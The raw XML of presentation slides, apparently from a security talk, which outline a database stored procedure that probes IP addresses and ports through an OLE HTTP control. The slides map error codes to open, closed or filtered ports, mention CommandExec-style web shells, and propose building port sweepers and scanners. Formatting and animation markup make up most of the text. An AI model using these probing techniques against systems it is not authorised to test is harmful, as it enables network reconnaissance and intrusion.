              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> WHEN -2147012744 THEN 'Open' WHEN 0 THEN 'Open/WWW' WHEN -2147012867 THEN 'Closed' WHEN -2147012894 THEN 'Filtered' WHEN -2147012851 THEN 'Open/WWWR' ELSE 'Invalid' END </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>END</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>END</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="5821363"/>
            <a:ext cx="8610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Basic probe stored procedure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2057400"/>
            <a:ext cx="8610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Instantiate OLE control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2362200"/>
            <a:ext cx="8610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Configure control timeouts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2895600"/>
            <a:ext cx="8610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Initialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> control (capture return code)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3200400"/>
            <a:ext cx="8610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Send request (capture return code)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3505200"/>
            <a:ext cx="8610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Grab HTTP status</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4038600"/>
            <a:ext cx="8610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Test return codes and determine port status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1676400"/>
            <a:ext cx="8610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Create URI from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and port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31" presetClass="emph" presetSubtype="0" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext" delay="0">
                                      <p:tgtEl>
                                        <p:sldTgt/>
                                      </p:tgtEl>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:clrVal>
                                          <a:schemeClr val="hlink"/>
                                        </p:clrVal>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontStyle</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="italic"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>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31" presetClass="emph" presetSubtype="0" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext" delay="0">
                                      <p:tgtEl>
                                        <p:sldTgt/>
                                      </p:tgtEl>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="27" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:clrVal>
                                          <a:schemeClr val="hlink"/>
                                        </p:clrVal>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="28" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontStyle</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="italic"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>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31" presetClass="emph" presetSubtype="0" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext" delay="0">
                                      <p:tgtEl>
                                        <p:sldTgt/>
                                      </p:tgtEl>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="39" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:clrVal>
                                          <a:schemeClr val="hlink"/>
                                        </p:clrVal>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="40" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontStyle</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="italic"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.textDecorationUnderline</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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="50" presetID="31" presetClass="emph" presetSubtype="0" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext" delay="0">
                                      <p:tgtEl>
                                        <p:sldTgt/>
                                      </p:tgtEl>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="51" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:clrVal>
                                          <a:schemeClr val="hlink"/>
                                        </p:clrVal>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="52" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontStyle</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="italic"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.textDecorationUnderline</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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="62" presetID="31" presetClass="emph" presetSubtype="0" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext" delay="0">
                                      <p:tgtEl>
                                        <p:sldTgt/>
                                      </p:tgtEl>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="63" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:clrVal>
                                          <a:schemeClr val="hlink"/>
                                        </p:clrVal>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="64" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontStyle</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="italic"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.textDecorationUnderline</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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="74" presetID="31" presetClass="emph" presetSubtype="0" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext" delay="0">
                                      <p:tgtEl>
                                        <p:sldTgt/>
                                      </p:tgtEl>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="75" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:clrVal>
                                          <a:schemeClr val="hlink"/>
                                        </p:clrVal>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="76" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontStyle</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="italic"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.textDecorationUnderline</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0"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>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par>
                                <p:cTn id="86" presetID="31" presetClass="emph" presetSubtype="0" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="onNext" delay="0">
                                      <p:tgtEl>
                                        <p:sldTgt/>
                                      </p:tgtEl>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="87" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:clrVal>
                                          <a:schemeClr val="hlink"/>
                                        </p:clrVal>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="88" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontStyle</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="italic"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="indefinite" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.textDecorationUnderline</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1"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9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(Continued.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Introduction of firewalls..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The failure to filter outbound traffic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>(circa 2000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CommandExec.[asp|jsp|php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>|*]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>{The need for a comfortable Channel}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="cmdasp.bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205613" y="3971925"/>
            <a:ext cx="4257675" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Picture 5.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6163251" y="3276600"/>
            <a:ext cx="1532949" cy="12192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Putting it together</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>probeIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() building block, we can build further tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2895600"/>
            <a:ext cx="8229600" cy="3581399"/>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rgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Port sweepers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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>scanports(ip</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>portlist</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>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rgbClr val="989898"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Portscanners</a:t>
            </a:r>
